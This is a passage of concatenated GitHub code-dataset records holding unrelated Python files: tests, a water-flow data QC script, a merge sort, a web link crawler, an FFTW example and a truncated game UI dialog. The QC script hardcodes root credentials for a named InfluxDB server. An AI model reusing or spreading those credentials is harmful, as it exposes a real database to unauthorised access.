GetLocalRequest)\n def test_default(self):\n local.username = None\n self.assertEqual(DEFAULT_USERNAME, get_request_username(DEFAULT_USERNAME))\n\n\nclass TestSetLocalUsername(TestCase):\n def test(self):\n username = random.random()\n set_local_username(username)\n self.assertEqual(username, local.username)\n\n\nclass TestMockRequest(TestCase):\n def test(self):\n self.assertIsInstance(get_moke_request(), WSGIRequest)\n","repo_name":"TencentBlueKing/bk-resource","sub_path":"tests/test_cases/utils/test_request.py","file_name":"test_request.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"72632496940","text":"from camera.linescan import LineScan\nfrom camera.gocator import GoCator\nfrom gui.widgets.lazyCanvas.lazyCanvas import LazyCanvas\nfrom gui.widgets.lazyCanvas.lazyGraphicsItem import LazyGraphicsPixmapItem\nfrom gui.widgets.lazyCanvas.linescanFrame import LinescanFrame\nfrom gui.widgets.lazyCanvas.gocatorFrame import GocatorFrame, ProjectedGocatorFrame\n\ndefault_scan = 5\n\n\ndef test_linescan(\n canvas: LazyCanvas,\n target_path: str = f\"data/line/{default_scan}\",\n target_width=1024,\n):\n camera = LineScan(target_path)\n\n preload_data, _ = camera.get(0)\n\n h, w = preload_data.shape[:-1]\n\n target_w = target_width\n target_h = int(target_w * 1.0 * h / w)\n\n for i in range(camera.data_size()):\n item = LinescanFrame(camera, i, target_w, target_h, w, h)\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n\n\ndef test_gocator(\n canvas: LazyCanvas, target_path: str = f\"data/gocator/xlsx/{default_scan}\"\n):\n camera = GoCator(target_path)\n\n dfs = camera.get(0)\n target_w = 1024\n _, _, data = camera.get_scaled_data(\n dfs, force_width=target_w, use_interp=True, keep_inf=True\n )\n preload_data = camera.get_image_from_depths(data)\n\n h, w = preload_data.shape\n\n target_h = target_w * 1.0 * h / w\n\n global_approx_min = None\n global_approx_max = None\n\n for i in range(camera.data_size()):\n item = GocatorFrame(camera, i, target_w, target_h, w, h)\n if global_approx_min is None or global_approx_max is None:\n global_approx_min, global_approx_max = item.estimate_approx_value_range()\n item.approx_min_value, item.approx_max_value = (\n global_approx_min,\n global_approx_max,\n )\n item.approx_min_value_limit, item.approx_max_value_limit = (\n global_approx_min,\n global_approx_max,\n )\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n\n\ndef test_projected_gocator(\n canvas: LazyCanvas,\n gocator_path=f\"data/gocator/xlsx/{default_scan}\",\n linescan_path=f\"data/line/{default_scan}\",\n):\n gocator = GoCator(gocator_path)\n linescan = LineScan(linescan_path)\n\n dfs = gocator.get(0)\n data_h, data_w = dfs[\"data\"].to_numpy()[:, 1:].shape\n x_resolution = dfs[\"info\"][\"XResolution\"].values[0]\n y_resolution = dfs[\"info\"][\"YResolution\"].values[0]\n aspect_ratio = (y_resolution * data_h) / (x_resolution * data_w)\n h_calculated = round(data_w * aspect_ratio)\n h, w = h_calculated, linescan.res\n\n target_w = 1024\n target_h = round(target_w * 1.0 * h / w)\n\n global_approx_min = -2000\n global_approx_max = 0\n\n for i in range(gocator.data_size()):\n item = ProjectedGocatorFrame(gocator, linescan, i, target_w, target_h, w, h)\n if global_approx_min is None or global_approx_max is None:\n global_approx_min, global_approx_max = item.estimate_approx_value_range()\n item.approx_min_value, item.approx_max_value = (\n global_approx_min,\n global_approx_max,\n )\n item.approx_min_value_limit, item.approx_max_value_limit = (\n global_approx_min,\n global_approx_max,\n )\n item.setPos(0, target_h * i)\n item.release()\n canvas.addItem(item)\n output_min = gocator.get_sensor_value_from_distance_to_camera(\n dfs, -global_approx_min\n )\n output_max = gocator.get_sensor_value_from_distance_to_camera(\n dfs, -global_approx_max\n )\n return output_min, output_max\n\n\ndef test(canvas: LazyCanvas):\n test_gocator(canvas)\n","repo_name":"luojy95/AggreEvl","sub_path":"gui/test/lazypixmap.py","file_name":"lazypixmap.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21413349436","text":"# Question1PythonTest1.py\r\n# Cooper Cross\r\n# 10/8/19\r\n\r\nimport turtle\r\njoe = turtle.Turtle()\r\nx = 0\r\ny = 0\r\njoe.ht()\r\n\r\nfor i in range(3):\r\n joe.penup()\r\n joe.goto(x,y)\r\n joe.pendown()\r\n joe.forward(100)\r\n y = y + 20\r\n\r\n\r\n","repo_name":"CooperCross/HHS-Python","sub_path":"Question1PythonTest1.py","file_name":"Question1PythonTest1.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"27213438489","text":"import pandas as pd\nfrom influxdb import InfluxDBClient\nfrom influxdb import DataFrameClient\nimport matplotlib.pyplot as plt\nfrom tempQC.calibrationFunctions import calibration_temp, calibration_flow, data_chunk\nimport numpy as np\nimport os\n\n\nos.chdir('/Users/augustus/Desktop/GRA/Thesis/Figures/data/')\nfile = 'BLDG_C_03-23_02-24_RAWflow.csv'\n\ndf = pd.read_csv(file)\n\ndf['time'] = pd.to_datetime(df['time'])\ndf.set_index('time', inplace=True)\n\ndef adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, threshold):\n filteredSignal = []\n window = []\n windowSize = minWindowSize\n headLength = 0\n for j in range(0, windowSize):\n window.append(signal[j])\n for i in range(0, len(signal)):\n delta = signal[i] - signal[i - 1]\n if np.absolute(delta) > threshold:\n windowSize = minWindowSize\n window.clear()\n if windowSize % 2 == 0:\n headLength = windowSize // 2\n else:\n headLength = (windowSize - 1) // 2\n if (i >= headLength) and (i < (len(signal) - headLength)):\n for j in range(0, windowSize):\n window.append(signal[i - (headLength - j)])\n elif (i < headLength):\n for j in range(0, windowSize):\n window.append(signal[i + j])\n else:\n for j in range(0, windowSize):\n window.append(signal[len(signal) - j])\n else:\n if (windowSize + 2) <= maxWindowSize:\n windowSize += 2\n window.append(0)\n window.append(0)\n\n if windowSize % 2 == 0:\n headLength = windowSize // 2\n else:\n headLength = (windowSize - 1) // 2\n if (i >= headLength) and (i < (len(signal) - headLength)):\n for j in range(0, windowSize):\n window[j] = signal[i - (headLength - j)]\n elif (i < headLength):\n for j in range(0, windowSize):\n window[j] = signal[i + j]\n else:\n for j in range(0, windowSize):\n window[j] = signal[len(signal) - j - 1]\n median = np.median(window)\n filteredSignal.append(median)\n percent = i / len(signal) * 100\n print(\" %2.2f %%, window size = %3d\" % (percent, windowSize), end=\"\\r\", flush=True)\n print(\"100.00 %%, window size = %3d\" % windowSize)\n return filteredSignal\n\n\n# accept inputs\nprint('Receiving inputs...\\n')\n# building ID\nbldg = input(\"Input building ID: \").upper()\nbldgIDQ1 = \"'\" + bldg + \"'\"\n# dates\nweek = int(input(\"Input week #: \"))\nbeginDate = \"'2019-03-22T12:00:00Z'\"\nendDate = \"'2019-03-22T18:00:00Z'\"\n\"\"\"\ndates = data_chunk(week)\n\n# Retrieve data\n# connect to database\nprint('\\nConnecting to database...')\n# Create client object with InfluxDBClient library\n# Set database.\nclient = InfluxDBClient(host='odm2equipment.uwrl.usu.edu', port=8086, username='root',password='foobar123')\nclient.switch_database('ciws')\n\n\n# write query\nprint('Assembling data query...')\n# Build query by concatenating inputs into query. InfluxDB query language has several\n# requirements. Fields/Tags must be bracketed with \" \" and the field/tag values must be bracketed with ' '.\n# Query returns a 'ResultSet\" type. Have to convert to pandas dataframe.\n\"\"\"\n#query = \"\"\"SELECT \"coldInFlowRate\",\"coldInTemp\", \"hotInFlowRate\", \"hotInTemp\", \"hotOutFlowRate\", \"hotOutTemp\"\n# FROM \"flow\"\n# WHERE \"buildingID\" =\"\"\"+bldgIDQ1+\"\"\" AND time >= \"\"\"+dates[0]+\"\"\" AND time <= \"\"\"+dates[1]+\"\"\"\"\"\"\n# send query\n\"\"\"\nprint('Retrieving data...')\n\nresults = client.query(query)\n# Query returns a 'ResultSet\" type. Have to convert to pandas dataframe.\n# Convert returned ResultSet to Pandas dataframe with list and get_points.\ndf = pd.DataFrame(list(results.get_points(measurement='flow')))\n# Set dataframe index as datetime.\ndf['time'] = pd.to_datetime(df['time'])\ndf.set_index('time', inplace=True)\n\"\"\"\n\nprint('Data retrieved!\\n')\n\n\n# Begin QC ##################\n\n# Temperature QC ############\n\n# tempQC: correlation, BLDG B\nif bldg == 'B' and week == 1:\n\n\n\n # Adjust inaccurate BldgB temp data with correlation from Bldg D temp data\n print ('Fetching data to adjust BLDG B temp data...')\n bldgIDQ2 = \"'D'\"\n beginDate2 = \"'2019-03-22T12:00:00Z'\"\n endDate2 = \"'2019-03-27T16:00:00Z'\"\n # query 2nd correlation dataset and convert to dataframe\n query = \"\"\"SELECT \"hotInTemp\" \n FROM \"flow\" \n WHERE \"buildingID\" =\"\"\" + bldgIDQ2 + \"\"\" AND time >= \"\"\" + beginDate2 + \"\"\" AND time <= \"\"\" + endDate2 + \"\"\"\"\"\"\n\n results = client.query(query)\n df_2 =pd.DataFrame(list(results.get_points(measurement='flow')))\n df_2['time'] = pd.to_datetime(df_2['time'])\n df_2.set_index('time', inplace=True)\n print('Adjustment data retrieved.\\n')\n df_2.rename(columns={'hotInTemp': 'hotInTemp_D'}, inplace=True)\n\n mainHot = df['hotInTemp'].truncate(after=pd.Timestamp('2019-03-27T16:00:00Z')).copy()\n mainHot = mainHot.to_frame()\n mainHotQC = pd.merge(mainHot, df_2, on='time')\n\n print('Calculating new temp values...')\n mainHotQC['hotInTemp'] = 8.25122766 + 0.8218035674 * mainHotQC['hotInTemp_D']\n df['hotInTemp'].update(mainHotQC['hotInTemp']) # update original dataframe, df\n print('New hotInTemp values for BLDG B calculated!\\n')\n\n\n temp_old = df['hotInTemp'].iloc[0] # Because of differences in missed second observations, have to\n for i, row in df.iterrows(): # parse through QCed dataframe and adjust unadjusted values\n x = row['hotInTemp'] # i.e. B temp data has 12:00:01 while D temp data does not, so\n if x < 40: # that timestamp is not updated with QC. Fix by replacing with prev temp value\n df.at[i, 'hotInTemp'] = temp_old\n else:\n temp_old = row['hotInTemp']\n\n# tempQC: level shift\ndf_temp = df.copy()\n# Add calibration factor to each value\nprint('Level shifting temp values...')\ncolumns = ['hotInTemp', 'hotOutTemp','coldInTemp']\nfor (column, cal) in zip(columns, calibration_temp(bldg)):\n df_temp[column] = df_temp[column] + cal\nprint('Level shifting temp values complete!\\n')\n\n\n# tempQC: point fix. Unless all heat exited the universe in this one second, Temp did not drop to -1333 deg Celsius\nif bldg == 'F' and week == 4:\n df_temp.at['2019-04-15T15:55:33', 'hotInTemp'] = 53.18400\n\n# Flow QC ###################\n\n\n# flowQC: filter noise\ndf_filter=df_temp.copy()\n\nprint('Filtering noise from hotInFlowRate...')\ndf_filter['hotInFlowRate'] = adaptiveMedianFilter(df_filter['hotInFlowRate'], 9, 301,0.5) # filter noise in hotInFlowRate\n # adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, Threshold)\nprint('hotInFlowRate complete!')\nprint('Filtering noise from coldInFlowRate...')\ndf_filter['coldInFlowRate'] = adaptiveMedianFilter(df_filter['coldInFlowRate'], 1, 301,0.5) # filter noise in coldInFlowRate\n # adaptiveMedianFilter(signal, minWindowSize, maxWindowSize, Threshold)\nprint('coldInFlowRate complete! \\n')\n\n\n\n\n\n# flowQC: fix return flow for bldg E\nx=0\nif bldg == 'E' and week == 1:\n df_2 = df_filter.truncate(after=pd.Timestamp('2019-03-22T14:20:23Z')).copy()\n counter = 0\n for i, row in df_2.iterrows():\n if x < 4:\n if counter < 16: # average pulse rate for this timeframe from other three weeks\n df_2.at[i, 'hotOutFlowRate'] = 0 # is 17.26 seconds/pulse. Mod code to add 18 second pulse every\n counter += 1 # every 4th pulse inserted to account for 0.26 second offset\n else:\n df_2.at[i, 'hotOutFlowRate'] = 1\n counter = 0\n x += 1\n elif x == 4:\n if counter < 17:\n df_2.at[i, 'hotOutFlowRate'] = 0\n counter += 1\n else:\n df_2.at[i, 'hotOutFlowRate'] = 1\n x = 1\n counter = 0\n\n\n df_filter['hotOutFlowRate'].update(df_2['hotOutFlowRate'])\n\n\ndf_shift = df_filter.copy()\n# flowQC: level shift\nprint('Level shifting hotInFlowRate values...')\nif bldg == 'B' and week == 4:\n df_2 = df_shift.truncate(before=pd.Timestamp('2019-04-16T19:40:00Z')).copy()\n df_2['hotInFlowRate'] = df_2['hotInFlowRate'] - 0.032\n df_shift['hotInFlowRate'].update(df_2['hotInFlowRate'])\nelif bldg == 'E' and week != 1:\n df_2 = df_shift.truncate(before=pd.Timestamp('2019-04-04T02:22:55Z')).copy()\n df_2['hotInFlowRate'] = df_2['hotInFlowRate'] - 0.031\n df_shift['hotInFlowRate'].update(df_2['hotInFlowRate'])\nprint('Level shifting flow complete! \\n')\n\n\n\n# flowQC: Pulse Aggregation\nprint('Aggregating pulses...')\ndf_agg = df_shift.copy()\ncoldInFlow_Sum =0 # Initalize variables to aggregate temp/flows in between pulses\nhotInFlow_Sum = 0\nhotInTemp_Sum = 0\ncoldInTemp_Sum = 0\nhotOutTemp_Sum = 0\ncounter = 0 # counter will count seconds between pulses\nfor i, row in df_agg.iterrows():\n if row['hotOutFlowRate'] == 0:\n coldInFlow_Sum = coldInFlow_Sum + row['coldInFlowRate']\n coldInTemp_Sum = coldInTemp_Sum +row['coldInTemp']\n hotInFlow_Sum = hotInFlow_Sum + row['hotInFlowRate']\n hotInTemp_Sum = hotInTemp_Sum + row['hotInTemp']\n hotOutTemp_Sum = hotOutTemp_Sum + row['hotOutTemp']\n counter += 1\n elif row['hotOutFlowRate'] != 0:\n counter = counter + 1\n coldInFlow_Sum = coldInFlow_Sum + row['coldInFlowRate']\n coldInTemp_Sum = (coldInTemp_Sum + row['coldInTemp']) / counter\n hotInFlow_Sum = hotInFlow_Sum + row['hotInFlowRate']\n hotInTemp_Sum = (hotInTemp_Sum + row['hotInTemp']) / counter\n hotOutTemp_Sum = (hotOutTemp_Sum + row['hotOutTemp']) / counter\n\n df_agg.at[i,'coldInFlowRate'] = coldInFlow_Sum\n df_agg.at[i,'coldInTemp'] = coldInTemp_Sum\n df_agg.at[i, 'hotInFlowRate'] = hotInFlow_Sum\n df_agg.at[i, 'hotInTemp'] = hotInTemp_Sum\n df_agg.at[i, 'hotOutTemp'] = hotOutTemp_Sum\n\n coldInFlow_Sum = 0 # Zero running sums after calculating aggregated values\n coldInTemp_Sum = 0\n hotInFlow_Sum = 0\n hotInTemp_Sum = 0\n hotOutTemp_Sum = 0\n counter = 0\n\nprint('Pulse aggregation complete!')\n\n\ndf_pulse = df_agg[(df_agg['hotOutFlowRate'] != 0)]\ndf_pulse['coldInFlowRate'] = df_pulse['coldInFlowRate']/60 # convert from gpm to gps\ndf_pulse['hotInFlowRate'] = df_pulse['hotInFlowRate']/60 # convert from gpm to gps\ndf_pulse['hotOutFlowRate'] = 1 # 1 pulse = 1 gal. SO every indicates 1 gal has passed through the return system\n\n\n# flowQC: zero hot water flow\nfor i, row in df_pulse.iterrows():\n if row['hotInFlowRate'] < 1:\n df_pulse.at[i, 'hotInFlowRate'] = 1\n\ndf_pulse['hotWaterUse'] = df_pulse['hotInFlowRate'] - df_pulse['hotOutFlowRate']\n\ndf_final = df_pulse.copy()\n\n# Add building ID, influx write points requires all data coming from dataframe\ndf_final['buildingID'] = bldg\n\n\nprint('QC Completed!\\n')\n\n\nprint('Plotting final flowrates...')\n# print final data\n#Initialize figures and subplots\ngridsize=(3,1)\nfig=plt.figure(1,figsize=(12,8))\nfig.autofmt_xdate()\nfig.suptitle('Final Flowrates for BLDG '+bldg, fontsize=14, weight='bold')\n\n # 1st row - hot in\naxHotFlow = plt.subplot2grid(gridsize, (0,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotFlow.plot(df_final['hotInFlowRate'], color='red', label='hotIn_final')\naxHotFlow.set_title('hot water flowrate', fontsize=10, weight ='bold')\naxHotFlow.set_ylabel('GPM')\n#axHotFlow.set_xlim(dates[0], dates[1])\naxHotFlow.grid(True)\n\n# 2nd row - cold in\naxColdFlow= plt.subplot2grid(gridsize, (1,0))\nplt.xticks(fontsize=8, rotation=35)\naxColdFlow.plot(df_final['coldInFlowRate'], color='blue', label='coldWaterUse_final')\naxColdFlow.set_title('cold water flowrate', fontsize=10, weight ='bold')\naxColdFlow.set_ylabel('GPM')\n#axColdFlow.set_xlim(dates[0], dates[1])\naxColdFlow.grid(True)\n\n# 3rd row - hot return\naxHotWaterUse = plt.subplot2grid(gridsize, (2,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotWaterUse.plot(df_final['hotWaterUse'], color='maroon', label='hotWaterUse_final')\naxHotWaterUse.set_title('hotWaterUse', fontsize=10, weight ='bold')\naxHotWaterUse.set_ylabel('GPM')\n#axHotWaterUse.set_xlim(dates[0], dates[1])\n#axHotWaterUse.set_ylim(-0.01, 0.05)\naxHotWaterUse.grid(True)\n\nfig.show()\nplt.tight_layout(pad=5, w_pad=2, h_pad=2.5)\n\n\nprint('Plotting final temperatures...')\nfig2=plt.figure(2,figsize=(12,8))\nfig2.suptitle('Final Temps for BLDG '+bldg, fontsize=14, weight='bold')\n\ngridsize = (2,1)\naxHotTemp = plt.subplot2grid(gridsize, (0,0))\nplt.xticks(fontsize=8, rotation=35)\naxHotTemp.plot(df_final['hotInTemp'], color='red', label='hotIn_final')\naxHotTemp.plot(df_final['hotOutTemp'], color='maroon', label='hotOut_final')\naxHotTemp.set_title('hot water temp', fontsize=10, weight ='bold')\naxHotTemp.set_ylabel('Temp (C)')\n#axHotTemp.set_xlim(dates[0], dates[1])\naxHotTemp.grid(True)\n\naxColdTemp = plt.subplot2grid(gridsize, (1,0))\nplt.xticks(fontsize=8, rotation=35)\naxColdTemp.plot(df_final['coldInTemp'], color='blue', label='1-Sec HOT Data')\naxColdTemp.set_title('cold water temp', fontsize=10, weight ='bold')\naxColdTemp.set_ylabel('Temp (C)')\n#axColdTemp.set_xlim(dates[0], dates[1])\naxColdTemp.grid(True)\n\nplt.tight_layout(pad=5, w_pad=2, h_pad=2.5)\nfig2.show()\nplt.show()\n\nx = input('Do you want to write to database? (y/n): ').upper()\n\nif x == 'Y':\n\n# WritePoints\n print('Connecting to database...')\n clientdf = DataFrameClient(host='odm2equipment.uwrl.usu.edu', port=8086, username='root',password='foobar123')\n clientdf.switch_database('ciws_final')\n print('Writing points...')\n clientdf.write_points(dataframe=df_final, measurement='LLC',\n field_columns={'hotInFlowRate':df_final[['hotInFlowRate']],\n 'coldInFlowRate': df_final[['coldInFlowRate']],\n 'hotOutFlowRate': df_final[['hotOutFlowRate']],\n 'hotInTemp': df_final[['hotInTemp']],\n 'coldInTemp': df_final[['coldInTemp']],\n 'hotOutTemp': df_final[['hotOutTemp']]\n },\n tag_columns={'buildingID': df_final[['buildingID']]},\n protocol='line', numeric_precision=10, batch_size=2000)\n clientdf.write_points(dataframe=df_final, measurement='LLC',\n field_columns={'hotInTemp': df_final[['hotInTemp']],\n 'hotOutTemp': df_final[['hotOutTemp']]\n },\n tag_columns={'buildingID': df_final[['buildingID']]},\n protocol='line', numeric_precision=10, batch_size=2000)\n\nelse:\n print('Better luck next time...')\n\n\n\n\nprint('DONE!!')\n\n","repo_name":"jBrewing/LLC_Tools","sub_path":"dataQC_final.py","file_name":"dataQC_final.py","file_ext":"py","file_size_in_byte":15027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29681349497","text":"from typing import List\n\n\n# python is pass by reference\ndef merge_sort(array: List[int]):\n print(\"input: {}\".format(array))\n\n if len(array) > 1:\n\n mid = len(array) // 2\n\n left = array[:mid]\n right = array[mid:]\n\n print(\"left: {}\".format(left))\n print(\"right: {}\".format(right))\n\n merge_sort(left)\n merge_sort(right)\n\n i = j = k = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n array[k] = left[i]\n i += 1\n else:\n array[k] = right[j]\n j += 1\n k += 1\n\n # Checking if any element was left\n while i < len(left):\n array[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n array[k] = right[j]\n j += 1\n k += 1\n\n print(\"sorted: {}\".format(array))\n\n\nif __name__ == \"__main__\":\n array: List[int] = [5, 3, 1, 2, 4]\n merge_sort(array)\n print(array)\n","repo_name":"maddmaster/algos","sub_path":"python/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36332654335","text":"_dungeon= {}\nstarting_position = (0, 0)\n\ndef room_exists(x, y):\n\treturn _dungeon.get((x, y))\n\ndef load_rooms():\n\twith open('resources/map.txt', 'r') as map:\n\t\trows = map.readlines()\n\tx_max = len(rows[0].split('\\t'))\n\tfor y in range(len(rows)):\n\t\tcolumns = rows[y].split('\\t')\n\t\tfor x in range(x_max):\n\t\t\troom_name = columns[x].replace('\\n', '')\n\t\t\tif room_name == \"StartingRoom\":\n\t\t\t\tglobal starting_position \n\t\t\t\tstarting_position= (x, y)\n\t\t\t_dungeon[(x, y)] = None if room_name == '' else getattr(__import__('rooms'), room_name)(x, y)\n","repo_name":"mcnuggz/PythonRPG","sub_path":"dungeon.py","file_name":"dungeon.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37289740018","text":"from bs4 import BeautifulSoup\nimport urllib\nfrom urllib.parse import urlsplit\nimport lxml.html\nimport re\nimport argparse\n\n\n# ------------------\nDEBUG_MODE = True\n# ==================\n\n\n\ndef getLinks(url):\n domain = base_url = \"{0.scheme}://{0.netloc}/\".format(urlsplit(url))\n html_page = urllib.request.urlopen(url)\n soup = BeautifulSoup(html_page)\n links = []\n\n for link in soup.findAll('a', attrs={'href': re.compile(\"^http://\")}):\n links.append(link.get('href'))\n\n for link in soup.findAll('a', attrs={'href': re.compile(\"^/\")}):\n links.append(domain + link.get('href')[1:])\n\n return links\n\ndef doesContain(url , lookfor):\n\n if DEBUG_MODE:\n print('Searching url: ' + url)\n\n html_page = urllib.request.urlopen(url)\n soup = BeautifulSoup(html_page)\n\n return soup.text.__contains__(lookfor)\n\n\ndef TreeSearch(url = 'http://cs.ubc.ca/~aghaee/', depth = 1, lookfor = 'Amin'):\n\n if depth == 0:\n if doesContain(url, lookfor):\n return url\n else:\n return -1\n\n result = []\n links = getLinks(url)\n\n for link in links:\n sub_result = TreeSearch(link, depth -1 , lookfor)\n\n if sub_result != -1:\n result = result + sub_result\n\n return result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('url', type=str)\n parser.add_argument('lookfor', type=str)\n parser.add_argument('-d', '--depth', type=int, default=1)\n args = parser.parse_args()\n\n result = TreeSearch(args.url, args.depth, args.lookfor)\n\n print('Results:\\n====================')\n if len(result) < 1:\n print(\"~~Nothing found!~~\")\n else:\n print(result)\n","repo_name":"aminrd/TreeSearch","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4027927684","text":"# REQUIRES: linux && libfftw3\n# RUN: %python \"%s\"\n\nimport math\nimport ctypes.util\nimport pydffi\n\npydffi.dlopen(ctypes.util.find_library(\"fftw3\"))\nFFI = pydffi.FFI()\nFFT = FFI.cdef(\"#include \")\n\n# Adapted from https://github.com/undees/fftw-example/blob/master/fftw_example.c\nNUM_POINTS = 64\nfftw_complex = FFT.types.fftw_complex\nsignal = FFI.arrayType(fftw_complex, NUM_POINTS)();\nresult = FFI.arrayType(fftw_complex, NUM_POINTS)();\n\ndef acquire_from_somewhere(signal):\n for i in range(NUM_POINTS):\n theta = float(i) / float(NUM_POINTS) * math.pi;\n\n signal[i][0] = 1.0 * math.cos(10.0 * theta) + \\\n 0.5 * math.cos(25.0 * theta);\n\n signal[i][1] = 1.0 * math.sin(10.0 * theta) + \\\n 0.5 * math.sin(25.0 * theta);\n\ndef do_something_with(result):\n for i in range(NUM_POINTS):\n mag = math.sqrt(result[i][0] * result[i][0] + \\\n result[i][1] * result[i][1]);\n print(\"%0.4f\" % mag);\n\n\nplan = FFT.funcs.fftw_plan_dft_1d(NUM_POINTS, signal, result, -1, 1<<6)\nacquire_from_somewhere(signal)\nFFT.funcs.fftw_execute(plan)\ndo_something_with(result)\n","repo_name":"aguinet/dragonffi","sub_path":"examples/fftw.py","file_name":"fftw.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":539,"dataset":"github-code","pt":"92"} +{"seq_id":"15167182886","text":"import pandas as pd\nimport os\nimport numpy as np\n\nos.chdir('/Users/mab8354/granddb/data')\n\n# GTEx samples (ALL)\ngtex_sex=pd.read_csv('GTExSamples_AllVariables.txt',sep='\\t')\ngtex=pd.read_csv('GTEx_v7_Annotations_SampleAttributesDS.txt',sep='\\t')\n\n# EGRET samples\negret=pd.read_csv('LCL_expression.csv')\nsamples = egret.columns[1:]\n# replace hyphens\nsamples = [x.replace('.','-') for x in samples]\n\n# find samples in df\naa = np.intersect1d(samples, gtex_sex['SampleID'], return_indices=True)\na = np.intersect1d(samples, gtex['SAMPID'], return_indices=True)\nb = gtex.iloc[a[2],]\nb.rename(columns = {'SAMPID':'SampleID'}, inplace = True)\n\n# select relevant columns\nsex_samples = gtex_sex.iloc[aa[2],[0,1,2,3,4,5,6,15,31,35]]\n\n# merge two subdfs\nouter_merged = pd.merge(b, sex_samples, how='outer')\n\n# do clean names\ncleannames = [x.replace('-','_') for x in outer_merged['SampleID']]\nouter_merged['cleanname'] = cleannames\n\n# save final df\nouter_merged.to_csv('egret_gtex.csv', index=False)","repo_name":"QuackenbushLab/grand","sub_path":"src/builddbDf/cells/buildegret_gtex.py","file_name":"buildegret_gtex.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"6503723153","text":"import wndMgr\nimport ui\nimport ime\nimport constInfo\nif constInfo.PSM:\n\timport localeInfo as _localeInfo\n\tlocaleInfo = _localeInfo.localeInfo()\nelse:\n\timport localeInfo\nimport app\nimport rRCvfR4c_fL4e\n\nclass PickMoneyDialog(ui.ScriptWindow):\n\tdef __init__(self):\n\t\tui.ScriptWindow.__init__(self)\n\n\t\tself.unitValue = 1\n\t\tself.maxValue = 0\n\t\tself.eventAccept = 0\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.unitValue2 = 0\n\t\t\tself.maxValue2 = 0\n\t\tif app.ENABLE_WINDOW_SLIDE_EFFECT:\n\t\t\tself.EnableSlidingEffect()\n\n\tdef __del__(self):\n\t\tui.ScriptWindow.__del__(self)\n\n\tdef LoadDialog(self):\n\t\ttry:\n\t\t\tpyScrLoader = ui.PythonScriptLoader()\n\t\t\tpyScrLoader.LoadScriptFile(self, \"UIScript/PickMoneyDialog.py\")\n\t\texcept:\n\t\t\timport exception\n\t\t\texception.Abort(\"MoneyDialog.LoadDialog.LoadScript\")\n\n\t\ttry:\n\t\t\tself.board = self.GetChild(\"board\")\n\t\t\tself.maxValueTextLine = self.GetChild(\"max_value\")\n\t\t\tself.pickValueEditLine = self.GetChild(\"money_value\")\n\t\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\t\tself.maxValueTextLine2 = self.GetChild(\"redcoin_max_value\")\n\t\t\t\tself.pickValueEditLine2 = self.GetChild(\"redcoin_value\")\n\t\t\tself.acceptButton = self.GetChild(\"accept_button\")\n\t\t\tself.cancelButton = self.GetChild(\"cancel_button\")\n\t\texcept:\n\t\t\timport exception\n\t\t\texception.Abort(\"MoneyDialog.LoadDialog.BindObject\")\n\n\t\tself.pickValueEditLine.SetReturnEvent(ui.__mem_func__(self.OnAccept))\n\t\tself.pickValueEditLine.SetEscapeEvent(ui.__mem_func__(self.Close))\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.SetReturnEvent(ui.__mem_func__(self.OnAccept))\n\t\t\tself.pickValueEditLine2.SetEscapeEvent(ui.__mem_func__(self.Close))\n\t\tself.acceptButton.SetEvent(ui.__mem_func__(self.OnAccept))\n\t\tself.cancelButton.SetEvent(ui.__mem_func__(self.Close))\n\t\tself.board.SetCloseEvent(ui.__mem_func__(self.Close))\n\n\tdef Destroy(self):\n\t\tself.ClearDictionary()\n\t\tself.eventAccept = 0\n\t\tself.maxValue = 0\n\t\tself.pickValueEditLine = 0\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.maxValue2 = 0\n\t\t\tself.pickValueEditLine2 = 0\n\t\tself.acceptButton = 0\n\t\tself.cancelButton = 0\n\t\tself.board = None\n\n\tdef SetTitleName(self, text):\n\t\tself.board.SetTitleName(text)\n\n\tdef SetAcceptEvent(self, event):\n\t\tself.eventAccept = event\n\n\tdef SetMax(self, max):\n\t\tself.pickValueEditLine.SetMax(max)\n\t\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\t\tself.pickValueEditLine2.SetMax(max)\n\n\tif app.ENABLE_FATIH_SAHIN_REDCOIN_SYSTEM:\n\t\tdef Open(self, maxValue, maxValue2, unitValue=0, unitValue2=0):\n\t\t\tif localeInfo.IsYMIR() or localeInfo.IsCHEONMA() or localeInfo.IsHONGKONG():\n\t\t\t\tunitValue = \"\"\n\t\t\t\tunitValue2 = \"\"\n\n\t\t\twidth = self.GetWidth()\n\t\t\t(mouseX, mouseY) = 